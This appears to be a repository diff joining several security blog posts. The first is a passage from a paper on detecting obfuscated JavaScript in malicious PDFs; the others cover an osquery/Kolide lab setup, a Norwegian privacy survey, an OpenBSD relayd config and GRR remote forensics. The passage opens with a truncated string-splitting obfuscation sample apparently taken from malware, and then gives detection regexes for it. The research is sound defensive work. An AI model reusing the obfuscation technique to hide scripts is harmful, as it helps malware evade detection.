z=c['s'+"ubstr"](0,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](2,1);s[a](z);z=c['s'+"ubstr"](3,1);s[a](z);z=c['s'+"ubstr"](4,1);s[a](z);z=c['s'+"ubstr"](5,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);z=c['s'+"ubstr"](7,1);s[a](z);z=c['s'+"ubstr"](8,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](10,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](13,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](14,1);s[a](z);z=c['s'+"ubstr"](12,1);[...](20,1);s[a](z);z=c['s'+"ubstr"](17,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](18,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](17,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](13,1);s[a](z);z=c['s'+"ubstr"](19,1);s[a](z);z=c['s'+"ubstr"](11,1);s[a](z);z=c['s'+"ubstr"](14,1);s[a](z);z=c['s'+"ubstr"](17,1);s[a](z);z=c['s'+"ubstr"](12,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](1,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);z=c['s'+"ubstr"](9,1);s[a](z);z=c['s'+"ubstr"](6,1);s[a](z);

Harawa et al. defined the above obfuscation technique as "string splitting" (as seen in the section "Introducing Obfuscation"). The following two obfuscation-extraction regular expressions were previously stated in the author's Bachelor's thesis [2]:

    e.{0,2}v.{0,2}a.{0,2}l.{0,1}

    u.{0,2}n.{0,2}e.{0,2}s.{0,2}c.{0,2}a.{0,2}p.{0,1}e

Keep the two above statements and the previous code excerpt in mind. When breaking down the above expressions, we introduce one more regular expression:

    s.{0,4}u.{0,4}b.{0,4}s.{0,4}t.{0,4}r.{0,4}

While searching for "substr" in plain text will certainly fail, the above expression will match e.g.:

    's'+"ubstr"

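A minimal sketch (illustration only, not the paper's jsunpack-n module) of how these obfuscation-tolerant expressions can be applied with Python's ``re`` module directly against the still-obfuscated script; the pattern names and the test string are assumptions for the example:

    import re

    # Obfuscation-tolerant patterns: allow a few "noise" characters
    # (quotes, plus signs, brackets) between the letters of each keyword.
    PATTERNS = {
        "eval": r"e.{0,2}v.{0,2}a.{0,2}l.{0,1}",
        "unescape": r"u.{0,2}n.{0,2}e.{0,2}s.{0,2}c.{0,2}a.{0,2}p.{0,1}e",
        "substr": r"s.{0,4}u.{0,4}b.{0,4}s.{0,4}t.{0,4}r.{0,4}",
    }

    def olovc_counts(script: str) -> dict:
        """Count matches of each pattern directly in the obfuscated script."""
        return {name: len(re.findall(pattern, script))
                for name, pattern in PATTERNS.items()}

    # The split-string form from the excerpt is matched even though a plain
    # search for "substr" would fail.
    print(olovc_counts("""z=c['s'+"ubstr"](0,1);s[a](z);"""))
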
Recall Kittilsen's javascript feature vector: ``[function, eval_length, max_string, stringcount, replace, substring, eval, fromCharCode]``. If extended by the above techniques, the results are somewhat different.

Without string splitting detection:

    ['function: 9', 'eval_length: x', 'max_string: 10849', 'stringcount: 1', 'replace: 1', 'substring|substr: 4', 'eval: 0', 'fromCharCode: 0']

With outer loop obfuscation variable computation:

    ['function: 0', 'eval_length: x', 'max_string: 67', 'stringcount: 2', 'replace: 0', 'substring: 0', 'substr: 3663', 'eval: 1', 'fromCharCode: 0']

Additionally, rewriting and extending Kittilsen's feature vector with several other typically suspicious functions should give preferable results: ``[max_string, stringcount, function, replace, substring, substr, eval, fromCharCode, indexof, push, unescape, split, join, sort, length, concat]``

This gives the following results for two random, but related, samples:

    [SHA256:5a61a0d5b0edecfb58952572addc06f2de60fcb99a21988394926ced4bbc8d1b]:{'function': 0, 'sort': 0, 'unescape': 0, 'indexof': 0, 'max_string': 10849, 'stringcount': 2, 'replace': 0, 'substring': 0, 'substr': 1, 'length': 1, 'split': 2, 'eval': 0, 'push': 0, 'join': 1, 'concat': 0, 'fromCharCode': 0}

    [SHA256:d3874cf113fa6b43e7f6e2c438bd500edea5cae7901e2bf921b9d0d2bf081201]:{'function': 0, 'sort': 0, 'unescape': 0, 'indexof': 0, 'max_string': 67, 'stringcount': 1, 'replace': 0, 'substring': 0, 'substr': 3663, 'length': 0, 'split': 0, 'eval': 0, 'push': 1, 'join': 1, 'concat': 0, 'fromCharCode': 0}

It perhaps needs no comment, but in the above results we see that two types of elements in the feature vector stand out: max_string and two of the suspicious functions.

Summarized, "Outer Loop Obfuscation Variable Computation" may be used to, at least partially, defeat the malware author's obfuscation attempts. Running the somewhat complex regular expressions for known malicious obfuscation routines against the 100,000 PDF dataset gives the result in the following table: the dataset generalized by "outer loop obfuscation variable computation", aggregated by counting javascript variables and functions with OLOVC applied (due to errors in jsunpack-n, the total number of entities calculated is 42736).

| Word | Count |
| --- | --- |
| function | 651 |
| sort | 7579 |
| unescape | 4 |
| toLowerCase | 1 |
| indexof | 8 |
| max_string | 42346 |
| stringcount | 41979 |
| replace | 70 |
| substring | 91 |
| substr | 38952 |
| length | 1512 |
| split | 9621 |
| eval | 77 |
| push | 260 |
| join | 91 |
| inverse_vector | 41423 |
| concat | 86 |
| fromCharCode | 45 |

The counts in the above table show that the selected feature vector has several very interesting features. On a side note: even though some features have a larger quantity than others, that is not necessarily a measure of how good the feature is; such is especially the case with the inverse vector, which we will become more familiar with in the next section. Also, as previously mentioned, it is interesting to see the composition of multiple features to determine the origin of the script (or the script style if you'd like). The aggregation script is attached in appendix 2.

"Outer Loop Obfuscation Variable Computation" will require a notable amount of computational resources in high-quantity networks due to the high workload. In a way this is unavoidable, since the threat agent's objective with running client-side scripts is to stress the resources of such systems.

![Fig. 5: Illustration of Computational Complexity. The illustration shows the computational load on a network sensor in regard to different obfuscation techniques](/images/2015/02/Skjermbilde-2012-05-08-kl--20-43-04.png)

### C.2. Feature Vector Inversion

Threat agents go a long way in evading detection algorithms. The following thought is derived from a common misconception in database security:

> A group of ten persons whose names are not to be revealed is listed, amongst a couple of thousand others, in an organization's LDAP directory. The group, let us name it X, is not to be revealed and is therefore not named in the department field.

While the public may not search and filter directly on the department name, being X, an indirect search would be successful in revealing the group, since the ten persons are the only ones not associated with a department.

The concept of searching indirectly may be applied to evaluating javascripts in PDF documents as well. We might start off with some of the expected characters found in benign javascript documents:

    {'viewerVersion':1,'getPrintParams':1,'printd':1,'var':10,'getPageNthWord':1,'annot':2,'numPages':1,'new':3}

The above is found by expert knowledge as the variables and functions probably used in a benign javascript or other object. Many of these functions are used in interactive PDF documents, e.g. for providing print buttons.

A weight is added to each cleartext function/variable. After counting the words in the document, a summarized variable named the inverted_feature_vector gives an integer. The higher the integer, the higher the probability of the javascript being benign.

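A minimal sketch (illustration only) of how such an inverted feature vector could be computed; the word list mirrors the benign indicators above, while the weights are assumed example values, not the weights used in the paper:

    import re

    # Assumed example weights for words expected in benign, interactive PDF javascript.
    BENIGN_WEIGHTS = {
        'viewerVersion': 1, 'getPrintParams': 1, 'printd': 1, 'var': 10,
        'getPageNthWord': 1, 'annot': 2, 'numPages': 1, 'new': 3,
    }

    def inverted_feature_vector(script: str) -> int:
        """Sum weight * occurrence count for each benign indicator word.
        A higher score suggests a more likely benign, non-obfuscated script."""
        score = 0
        for word, weight in BENIGN_WEIGHTS.items():
            score += weight * len(re.findall(re.escape(word), script))
        return score

    print(inverted_feature_vector("var params = this.getPrintParams(); this.print(params);"))
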
The inverted feature vector may be used as a signature, and a whitelist indication database may be built from datasets. In the 100k malicious dataset, the statistics showed that out of 42475 entities, 41423 had more than one occurrence of a known benign variable. This might seem like a poor feature, but the quantity is not the issue here; it is the weight of each variable. So: one may say that the higher the inverse vector is, the more likely it is that the PDF or javascript is benign. To clarify, the next table shows the entities fragmented by weight: the inverse vector separated by interval for the Shadowserver 100k dataset.

**Shadowserver 100k dataset.** _The table shows that most malicious PDF files in the 100k Shadowserver dataset contain low-weighted scores when it comes to the inverted vector as a measure of how benign the scripts are._

| Weight interval | Instances | Instance percentage |
| --- | --- | --- |
| <10 | 15232 | 35,6% |
| 20<>9 | 26852 | 62,8% |
| 30<>19 | 136 | ~0% |
| 40<>29 | 148 | ~0% |
| 50<>39 | 87 | ~0% |
| 60<>49 | 28 | ~0% |
| >60 | 253 | ~0% |
| Total | 42736 | - |

The inversion vector may also be seen as a measure of the likelihood that the script is obfuscated. A quick look at the table shows that the characteristics of obfuscation are found in most PDF documents in the Shadowserver 100k dataset.

Even though this part of the vector should be seen as an indication, analysts should be aware that threat agents may adapt to the detection technique and insert clear-text variables, such as the ones listed above, in addition to their malicious javascripts. The latter would function as a primitive feature vector inversion jammer. In other words, it should be seen in context with the other items of the javascript feature vector as well. Further, the concept should be evolved to avoid such evasion. One technique is to segment the code before analyzing it (giving each code segment a score, finally generating an overall probability score), making it more difficult for the threat agent to utilize noise in his obfuscation.

### D. Clustering

Experience shows that in practically oriented environments, security analysis is, at least partially, done manually. That is, detection is based on indicators or anomalies, and the analysis of the detection results is performed manually by an analyst. Though this may be the approach resulting in the fewest false positives, it is overwhelming in regard to analyzing all potentially malicious PDF documents in a larger organization. The 100k PDF dataset used in this paper is evidence of that. So, how is it possible to automatically detect the interesting parts of the 100k PDF dataset? This question leads to the concept of data mining.

The definition of data mining is the transformation of data into "meaningful patterns and rules".

Michael Abernethy at IBM developerWorks [20] covers data mining quite extensively.

#### D.1. A Narrow Experiment and Results

In this paper the goal is to achieve a view of the dataset through what is named "undirected" data mining: trying to find patterns or rules in existing data. This is achieved through the feature vector previously presented.

Up until now this paper has discussed how to generate a satisfactory feature vector and what makes up the measure of similarity. Let us do an experiment using WEKA (Waikato Environment for Knowledge Analysis) to analyze our feature vector.

Appendix 3 describes the ARFF format derived from our feature vector, two of the previously presented feature vectors (SHA256: ``5a61a0d5b0edecfb58952572addc06f2de60fcb99a21988394926ced4bbc8d1b``, ``d3874cf113fa6b43e7f6e2c438bd500edea5cae7901e2bf921b9d0d2bf081201``) and a random selection of 2587 parseable PDF documents from the dataset.

In this experiment the feature vector was produced from 200 random samples from the 100k dataset. Interesting in that regard is that the subdataset they were loaded from originally contained 6214 samples, while our application only handled the decoding of under half. The feature vector was extracted in CSV format, converted by the following WEKA Java class and loaded into WEKA:

    java -classpath /Applications/weka-3-6-6.app/Contents/Resources/Java/weka.jar weka.core.converters.CSVLoader dataset.csv

In the WEKA preprocessing, the results may be visualized:

![Fig. 6: Results 1; PDF Feature Vector Distribution. A model showing the PDF feature vector object distribution using the 2587 parsable PDF documents](/images/2015/02/Skjermbilde-2012-05-16-kl--13-17-20.png)

### D.2. The complete dataset

Next, loading the complete feature vector dataset consisting of 42736 entities showed interesting results when clustering.

![Fig. 7: Stringcount vs anomalies in the inverse vector. Stringcount vs anomalies in the inverse_vector, using the k-means algorithm and k=5. Medium jitter to emphasize the clusters](/images/2015/02/Skjermbilde-2012-06-27-kl--11-40-19.png)

The cluster process above also enables the possibility of looking at anomalies where the inverse_vector is high. For instance, for entity 9724 (the highest one on the Y-axis) the inverse_vector is 21510, which is a very clear anomaly compared to the rest of the clusters (the distance is far). This should encourage a closer look at the file based on its hash.

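For illustration only (WEKA was used in the paper), a similar clustering could be sketched in Python with pandas and scikit-learn on the exported CSV; the file name ``dataset.csv`` and its column names are assumptions:

    import pandas as pd
    from sklearn.cluster import KMeans

    # Assumed: dataset.csv holds one row per PDF with the extended javascript
    # feature vector (max_string, stringcount, substr, inverse_vector, ...).
    df = pd.read_csv("dataset.csv")
    features = df.select_dtypes("number")

    # k=5 as in the figure above; labels give the cluster per document.
    km = KMeans(n_clusters=5, n_init=10, random_state=0).fit(features)
    df["cluster"] = km.labels_

    # Inspect documents whose inverse_vector is unusually high,
    # e.g. the 21510 outlier mentioned above.
    outliers = df.sort_values("inverse_vector", ascending=False).head(10)
    print(outliers[["inverse_vector", "cluster"]])
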
The Shadowserver 100k ARFF dataset will be further evolved and may be found at the project GitHub page [25].

### E. Logging and Interpreting Errors

Again and again while analyzing the 100k dataset, the interpreter ran into parsing errors. Bad code, one may say, but the fact is that threat agents are adapting their code to evade known tools and frameworks. An example of this is a recent bug [21] in Stevens' PDF parser, where empty PDF objects in fact created an exception in the application.

So, what does this have to do with this paper? Creative threat agents can never be avoided; they will create malicious code that evades the detection routines. This makes an important point: the application implemented should use strict deobfuscation and interpretation routines. When an error occurs, which will happen sooner or later, the file should be traceable and manually analyzed. This in turn should lead to an adaption of the application. Where the routines fail will also be a characteristic of the threat agent: what part of the detection routines does he try to evade? E.g., in the 100k dataset an error in the ascii85 filter occurred. The parsing error made the parser module not output a feature vector, and it was detected by error monitoring in log files.

## Discussion and Conclusions

In regard to being used standalone as evidence, the feature vector will have its limitations; especially since it is hard to connect it to an event, it should be considered circumstantial.

The PDF and ECMA standards are complex and difficult to interpret, especially when it comes to automation. As has been shown in this article, a really hard problem is dynamically and generically executing javascripts for deobfuscation. This shows even within Adobe Reader, where e.g. Adobe Reader X uses Spidermonkey 1.8, while previous, more prevalent versions use version 1.7 of Spidermonkey. This often resulted in parsing errors, and again it will potentially cause a larger error rate in the next generation of intrusion detection systems.

It has been shown that a static analysis through a Jsunpack-n modification recovers good enough round-zero data, from a little less than half of the Shadowserver 100k dataset, to generate a characteristic of each file. The results were somewhat disappointing in regard to the extensive parsing errors. Parsing optimization and error correction, making the script more robust and reliable, should be covered in a separate report. Despite the latter, a good foundation and enough data were given to give a clue of what to expect from the extended PDF feature vector. Also, the inverse vector with its weighting gives an individual score to each document, making it exceptionally promising for further research.

In regard to OLOVC, a certain enhancement would be to combine it with the work of Franke and Petrovic, "Improving the efficiency of digital forensic search by means of constrained edit distance". Their concept seems quite promising and might provide valuable input to OLOVC.

The dataset used in this article may contain certain flaws in its scientific foundation. No dataset flaws as such, but indications that some data originates from the same source have been seen throughout this article. The reason is most probably that the dataset was collected over three continuous days. Linked to the behaviour of malware, it is known that certain malware, such as drive-by attacks, has peaks in its spread as a function of time. It is therefore natural to assume that there are larger occurrences of PDF documents originating from the same threat agent. On the other side, in further research, this should be a measure of the effectiveness of the algorithms' ability to group the data.

The Shadowserver 100k dataset only contains distinct files. It would be interesting to recollect a similar dataset with non-distinct hash entries, and to cluster it by fuzzy hashing as well.

Even though clustering is mentioned in the last part of this article, further extensive research should be done to completely explore the potential of using the current feature vector. In other words, the scope of the article permitted only a manual selection of a feature vector and a more or less defined measure of similarity through the extended PDF feature vector.

The project has a maintained GitHub page as introduced in the last section. This page should encourage further development of the extended PDF feature vector.

If you'd like, please have a look at the GuC Testimon Forensic Laboratory [1].

[1] GuC Testimon Forensic Laboratory: https://sites.google.com/site/testimonlab/

211 data/osquery.md Normal file
@ -0,0 +1,211 @@

In another post I wrote about how telemetry is a challenge [1] in a changing, more diverse and modern landscape. Recently I have reviewed some device inventory and endpoint detection tools that will add to the solution. In the future I will get back to my view on Mozilla InvestiGator (MIG) [2], but this post will focus on a telemetry collection tool that I have grown fond of: osquery [3].

osquery was originally developed by Facebook for the purpose of [4]:

> Maintaining real-time insight into the current state of your infrastructure[...]

With osquery, data in the operating system in which the agent runs is abstracted to a SQL-based interface. It contains a near-infinite amount of available data, which is perfect for a network defender. osquery can even parse native sqlite databases, of which there are lots in macOS. It also works in a distributed mode like GRR and MIG; in practical terms this means that queries are distributed. On the other hand, events can be streamed as well when considering operational security.

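As a small illustration of that SQL interface (my own sketch, not from the osquery documentation), the local ``osqueryi`` shell can be driven from Python and asked for the same system_info fields that the Kolide decorators later in this post use; the JSON output mode is assumed available on your build:

    import json
    import subprocess

    def osquery(sql: str):
        """Run a query against the local osqueryi shell and return parsed JSON rows."""
        out = subprocess.run(
            ["osqueryi", "--json", sql],
            capture_output=True, check=True, text=True,
        )
        return json.loads(out.stdout)

    # Same data the Kolide decorators use further down: host UUID and hostname.
    for row in osquery("SELECT uuid, hostname FROM system_info;"):
        print(row["uuid"], row["hostname"])
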
![Example of the hardware_events table when plugging in and then detaching a Yubikey](/static/img/data/osquery_hardware_events.png)

Since 2014 osquery has been open source and now has a large community developing just about every aspect of the tool. According to the briefs that are online, several major institutions, including Facebook, now use osquery in service networks.

osquery is cross-platform and now supports Linux, FreeBSD, Windows and macOS. That is also some of what separates it from its alternatives, like sysmon.

Posts about osquery that you should review before moving on:

* Doug Wilson's excellent presentation at FIRST 2018 (security-usage focused) [5]
* Managing osquery with Kolide (an osquery tls server) [6]
* Another post on applying osquery for security [7]
* Palantir on osquery [8]

So that was a couple of links to get you started. The next section shows you how to quickly get a lab environment up and running.

## Setup and Configuration

### Prerequisites

There are only two things you need set up for the rest of this article if you are on macOS, and both can easily be installed using Homebrew [9]:

    brew install go yarn

You also need to configure your Go path, which can basically be:

    echo "export GOPATH=$HOME/go" >> ~/.bash_profile

### Server Setup

Set up a Docker image of Kolide Fleet [10]:

    mkdir -p $GOPATH/src/github.com/kolide
    cd $GOPATH/src/github.com/kolide
    git clone git@github.com:kolide/fleet.git
    cd fleet
    make deps && make generate && make
    docker-compose up

Populate the database:

    ./build/fleet prepare db

You are now ready to boot up the web UI and API server:

    ./build/fleet serve --auth_jwt_key=3zqHl2cPa0tMmaCa9vPSEq6dcwN7oLbP

Get the enrollment secret and certificate from the Kolide UI at ``https://localhost:8080`` after doing the registration process.

![Kolide enrollment](/static/img/data/kolide-enrollment.png)

### Client Setup

Make the API token (enrollment secret) persistent at the endpoint:

    echo "{enrollment-secret}" > /etc/osquery/enrollment.secret

Define a flags file in ``/private/var/osquery/osquery.flags``. This is the one the client uses to apply the centralised tls logging method, which is the API Kolide has implemented. It is also certificate pinned, so all is good.

    --enroll_secret_path=/etc/osquery/enrollment.secret
    --tls_server_certs=/etc/osquery/kolide.crt
    --tls_hostname=localhost:8080
    --host_identifier=uuid
    --enroll_tls_endpoint=/api/v1/osquery/enroll
    --config_plugin=tls
    --config_tls_endpoint=/api/v1/osquery/config
    --config_tls_refresh=10
    --disable_distributed=false
    --distributed_plugin=tls
    --distributed_interval=10
    --distributed_tls_max_attempts=3
    --distributed_tls_read_endpoint=/api/v1/osquery/distributed/read
    --distributed_tls_write_endpoint=/api/v1/osquery/distributed/write
    --logger_plugin=tls
    --logger_tls_endpoint=/api/v1/osquery/log
    --logger_tls_period=10

You can start the osquery daemon on the client by using the following command. At this point you should start thinking about packaging, which is detailed in the osquery docs [11].

    /usr/local/bin/osqueryd --disable_events=false --flagfile=/private/var/osquery/osquery.flags

osquery also has an interactive mode if you would like to test the local instance, based on a local configuration file:

    sudo osqueryi --disable_events=false --config_path=/etc/osquery/osquery.conf

To make the client persistent on macOS, use the following documentation from osquery [12].

### Managing the Kolide Configuration

For this part I found that what worked best was using the Kolide CLI client [13]:

    ./build/fleetctl config set --address https://localhost:8080
    ./build/fleetctl login
    ./build/fleetctl apply -f ./options.yaml

The ``options.yaml`` I used for testing was the following. This setup also involves setting up osquery File Integrity Monitoring (FIM) [14], which I wasn't able to get working with the patching curl command [15] in the docs. The config monitors changes in files under ``/etc`` and a test directory at ``/var/tmp/filetest``.

    apiVersion: v1
    kind: options
    spec:
      config:
        decorators:
          load:
            - SELECT uuid AS host_uuid FROM system_info;
            - SELECT hostname AS hostname FROM system_info;
        file_paths:
          etc:
            - /etc/%%
          test:
            - /var/tmp/filetest/%%
        options:
          disable_distributed: false
          distributed_interval: 10
          distributed_plugin: tls
          distributed_tls_max_attempts: 3
          distributed_tls_read_endpoint: /api/v1/osquery/distributed/read
          distributed_tls_write_endpoint: /api/v1/osquery/distributed/write
          logger_plugin: tls
          logger_tls_endpoint: /api/v1/osquery/log
          logger_tls_period: 10
          pack_delimiter: /
      overrides: {}

## Next Steps

Through this article we've reviewed some of the basic capabilities of osquery and also had a compact view of a lab setup demonstrating centralised logging to Kolide, using the tls API of osquery.

A couple of things that I would have liked to see are support for OpenBSD [16], Android and iOS [17].

The local setup obviously does not scale beyond your own computer. I briefly toyed with the idea that this would be a perfect fit for ingesting into a Hadoop environment, and not surprisingly there's a nice starting point over at the Hortonworks forums [18].

There's a lot of open source information on osquery. I also found the Uptycs blog useful [19].

[1] https://secdiary.com/2018-02-25-telemetry.html
[2] https://mig.mozilla.org
[3] https://osquery.io
[4] https://code.fb.com/security/introducing-osquery/
[5] https://www.first.org/resources/papers/conf2018/Wilson-Doug_FIRST_20180629.pdf
[6] https://blog.kolide.com/managing-osquery-with-kolide-launcher-and-fleet-b33b4536acb4
[7] https://medium.com/@clong/osquery-for-security-part-2-2e03de4d3721
[8] https://github.com/palantir/osquery-configuration
[9] https://brew.sh
[10] https://blog.kolide.com/managing-osquery-with-kolide-launcher-and-fleet-b33b4536acb4
[11] https://osquery.readthedocs.io/en/2.1.1/installation/custom-packages/
[12] https://osquery.readthedocs.io/en/stable/installation/install-osx/
[13] https://github.com/kolide/fleet/blob/master/docs/cli/setup-guide.md
[14] https://osquery.readthedocs.io/en/stable/deployment/file-integrity-monitoring/
[15] https://github.com/kolide/fleet/tree/master/docs/api#file-integrity-monitoring
[16] https://github.com/facebook/osquery/issues/4703
[17] https://github.com/facebook/osquery/issues/2815
[18] https://community.hortonworks.com/articles/79842/ingesting-osquery-into-apache-phoenix-using-apache.html
[19] https://www.uptycs.com/blog

69 data/privacy-report-2014.md Normal file
@ -0,0 +1,69 @@

I read in a Norwegian news publication yesterday that more than 50% of Norwegians don't care about Internet and network surveillance [1]. In the original 60-page report (survey and report ordered by the Norwegian Data Protection Authority), named Privacy 2014 - The Current State and Trends ("Personvern 2014 - Tilstand og Trender"), 46% of the 1501 participants state that they've become more concerned with privacy over the last 2-3 years.

The follow-up question that the survey presented was "How much do you care about privacy?". In the 1997 version of the survey 77% said they were "pretty engaged or very engaged" in privacy, while in 2013 there's an increase to 87%. Not as bad as the news publication wants it to be, in other words. I guess what is referred to is mentioned in the section "The Chilling Effects in Norway", where more than half of the respondents state they haven't changed online behaviour after the revelations of the American surveillance methodologies. I think this correlates with the next section (below). Also, more than 45% state that they would have continued as normal if Norway were to start a massive surveillance campaign in collaboration with foreign intelligence.

I read one section where it was asked "how much control of your own situation do you feel you have?". More than half of the respondents answered themselves, and 33% the government. The latter is pretty amazing in my opinion. It's obviously yourself that is responsible for your own situation. Seen in regard to the fact that more than 78% wouldn't pay 20 bucks a month for privacy in online services, it's even better.

The report also has its own section dedicated to the Snowden revelations. Pretty interesting that 53% responded that they didn't care about the surveillance, that it is unproblematic, or that it's just plain necessary. Interesting, considering that it's another nation state than Norway we're talking about here. I could have understood it if it was our own government, but another country? Anyways, those are the facts.

One question that I perhaps miss in the survey is "have you done anything to protect your online presence from surveillance?". One of the alternatives could for instance be: "I use end-to-end encryption, such as GPG". It was obviously not that technical a survey, and I can respect that - but at the same time I see that's where it has to end at some point. Thinking of myself employed in another type of occupation: I think people would have continued as normal if we got a mass-surveillance state, because you get to a point of exhaustion due to the complexity of the technology and lack of knowledge on how to actually protect yourself. I also think that the hypothetical question of awareness of a mass-surveillance state would have had more chilling effects than people actually report. The question actually reminds me of the Iron Curtain period, thinking that you are always surveilled.

The survey can be read in full here [2] (Norwegian), and I think it's pretty good and thorough on the current state of privacy in Norway. The survey was delivered by Opinion Perduco. The 1997 survey was delivered by Statistics Norway.

[1] http://translate.google.com/translate?sl=auto&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&u=http%3A%2F%2Fwww.digi.no%2F926712%2Fhalvparten-gir-blaffen
[2] https://www.datatilsynet.no/Nyheter/2014/Personvern-2014-tilstand-og-trender-/

134 data/relayd-multidomain.md Normal file
@ -0,0 +1,134 @@

While running a relayd service for a multi-domain instance recently, I quickly ran into an issue with relayd routing.

relayd(8) is the relay daemon in OpenBSD.

I run two local services that I front with relayd:

* service A
* service B

These two I define in relayd.conf(5):

    ext_addr="<SOME-IP>"
    honk_port="31337"
    inks_port="31338"
    table <serviceA> { 127.0.0.1 }
    table <serviceB> { 127.0.0.1 }

To make sure relayd logs sufficiently for traceability I apply the following options:

    log state changes
    log connection

The next part of my relayd.conf is creating a configuration for the relay service ("protocols are templates defining settings and rules for relays"):

    http protocol https { }

For the service definition I make sure to add the remote address and local address:

    match request header append "X-Forwarded-For" value "$REMOTE_ADDR"
    match request header append "X-Forwarded-By" \
        value "$SERVER_ADDR:$SERVER_PORT"

A further important logging configuration comes next, and I make sure my relay logs the Host, X-Forwarded-For, User-Agent and Referer headers and the url:

    match header log "Host"
    match header log "X-Forwarded-For"
    match header log "User-Agent"
    match header log "Referer"
    match url log

For performance [1]:

    tcp { nodelay, sack, socket buffer 65536, backlog 100 }

Next I disable vulnerable ciphers:

    tls no tlsv1.0
    tls no tlsv1.1
    tls tlsv1.2

Sadly tlsv1.3 is still in -current, so we will have to wait for that.

I configure keys as follows:

    tls ca cert "/etc/ssl/cert.pem"
    tls keypair serviceA.domain
    tls keypair serviceB.domain

Finally we use the tables defined initially to route traffic to the right internal service:

    match request header "Host" value "serviceA.domain" forward to <serviceA>
    match request header "Host" value "serviceB.domain" forward to <serviceB>

And that is it for the service definition.

In addition we define the relay ("relays will forward traffic between a client and a target server") as follows. The "protocol https" line is the junction between the two parts of the config.

    relay https_relay {
        listen on $ext_addr port https tls
        protocol https

        forward to <honk> port $honk_port check tcp
        forward to <inks> port $inks_port check tcp
    }

The whole config:

    ext_addr="159.100.245.242"
    honk_port="31337"
    inks_port="31338"
    table <honk> { 127.0.0.1 }
    table <inks> { 127.0.0.1 }

    log state changes
    log connection

    http protocol https {
        match request header append "X-Forwarded-For" value "$REMOTE_ADDR"
        match request header append "X-Forwarded-By" \
            value "$SERVER_ADDR:$SERVER_PORT"
        match request header set "Connection" value "close"

        match header log "Host"
        match header log "X-Forwarded-For"
        match header log "User-Agent"
        match header log "Referer"
        match url log

        tcp { nodelay, socket buffer 65536, backlog 100 }

        tls no tlsv1.0
        tls no tlsv1.1
        tls tlsv1.2
        tls ca cert "/etc/ssl/cert.pem"

        tls keypair cybsec.network
        tls keypair inks.cybsec.network

        match request header "Host" value "cybsec.network" forward to <honk>
        match request header "Host" value "inks.cybsec.network" forward to <inks>
    }

    relay https_relay {
        listen on $ext_addr port https tls
        protocol https

        forward to <honk> port $honk_port check tcp
        forward to <inks> port $inks_port check tcp
    }

[1] https://calomel.org/relayd.html

159 data/remote-forensics.md Normal file
@ -0,0 +1,159 @@

Like everything else in information security, forensics is constantly evolving. One matter of special interest for practitioners is doing forensics on remote computers, not that it's entirely new.

The use case is self-explanatory to those working in the field, but for beginners I'll give a brief introduction.

When you get a case on your desk and it lights up as something interesting, what do you do? Probably your first step is searching for known malicious indicators in network logs. Finding something interesting on some of the clients, let's say ten in this case, you decide to put some more effort into explaining the nature of the activity. None of the clients is nearby; several of them are even at locations with 1Mbps upload speeds.

The next phase would probably be a search in open sources, perhaps turning up support for something fishy going on. Now you'd like to examine some of the client logs for known hashes and strings you found, and the traditional way to go is acquiring disk and memory images physically. Or is it? That would easily have taken weeks for ten clients. In this case you are lucky and have a tool for performing remote forensics at hand. The tool was a major roll-out for your organization after a larger breach.

What's new in remote forensics is that the tools are beginning to get more mature, and by that I would like to introduce two products which I find most relevant to the purpose:

* Google Rapid Response (GRR) [1]
* Mandiant for Incident Response (MIR) [2]

Actually I haven't put the latter option to the test (MIR supports OpenIOC, which is an advantage), but I have chosen to take GRR for a spin for some time now. There are also other tools which may be of interest to you, such as Sourcefire FireAmp, which I've heard performs well for endpoint protection. I've chosen to leave that out of this presentation since this is about a different concept. So the following will use GRR as a basis.

For this post there are two prerequisites for you to follow, which I highly recommend to get the feel of GRR:

* Set up a GRR server [3]. In this post I've used the current beta 3.0-2, running all services on the same machine, including the web server and client roll-in interface. There is one install script for the beloved Ubuntu here, but I couldn't get it easily working on other systems. One exception is Debian, which only needed minor changes. If you have difficulties with the latter, please give me a heads-up.
* Sacrifice one client (it won't brick a production system as far as I can tell either, though) to be monitored. You will find binaries after packing the clients in the GRR server setup. See the screenshot below for details. The client will automatically report in to the server.

You can find the binaries by browsing from the home screen in the GRR web GUI. Download and install the one of choice.

A word of warning before you read the rest of this post: the GRR website ~~is~~ was a little messy and not entirely intuitive. I found, after a lot of searching, that the best way to go about it is reading the code usage examples in the web GUI, especially when it comes to what Google named flows. Flows are little plugins in GRR that may for instance help you task GRR to fetch a file on a specific path.

Notice the call spec. This can be transferred directly to the iPython console. Before I started off I watched a couple of presentations that Google has delivered at LISA. I think you should too if you'd like to see where GRR is going and why it came to be. The one here gives a thorough introduction to how Google makes sure they are able to respond to breaches in their infrastructure [4].

I would also like to recommend a presentation by Greg Castle at BlackHat for reference [5]. For usage and examples, Marley Jaffe at Champlain College has put up a great paper. Have a look at the exercises at the end of it.

What is good with GRR is that it supports the most relevant platforms: Linux, Windows and OS X. These are also fully supported platforms at Google, so expect development to have a practical and long-term perspective.

While GRR is relevant, it is also fully open source, and extensible. It's written in Python with all the niceness that comes with it. GRR has direct memory access through custom-built drivers. You will find support for Volatility in there. Well, they forked it into a new project named Rekall, which is more suited for scale. Anyways, it provides support for plugins such as Yara.

